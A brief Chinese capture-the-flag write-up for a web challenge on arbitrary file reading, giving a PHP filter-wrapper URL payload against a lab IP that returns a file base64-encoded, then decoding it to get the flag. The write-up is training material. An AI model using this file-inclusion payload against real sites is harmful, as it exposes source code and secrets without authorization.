NU1LCTFer的成长之路-web入门-任意文件读取漏洞-afr_1-wp

afr_1

payload

http://192.168.60.134/?p=php://filter/convert.base64-encode/resource=flag

这句话的意思是我们用base64编码的方式来读文件index.php;这时页面会显示出源文件index.php经过base64编码后的内容,然后经过base64解码就可以看到flag;

NU1LCTFer的成长之路-web入门-任意文件读取漏洞-afr_1-wp

BP base64解码得到flag

上一篇:[DM]分类-支持向量机


下一篇:NU1LCTFer的成长之路-web入门-任意文件读取漏洞-afr_3-wp